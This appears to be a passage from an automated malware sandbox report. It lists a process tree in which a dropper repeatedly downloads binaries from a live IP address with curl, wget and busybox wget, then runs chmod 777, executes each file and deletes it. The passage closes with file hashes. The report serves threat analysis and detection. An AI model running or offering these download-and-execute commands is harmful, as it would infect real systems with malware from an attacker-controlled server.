/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:945
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:951
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:957
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:963
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:969
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:975
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:981
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97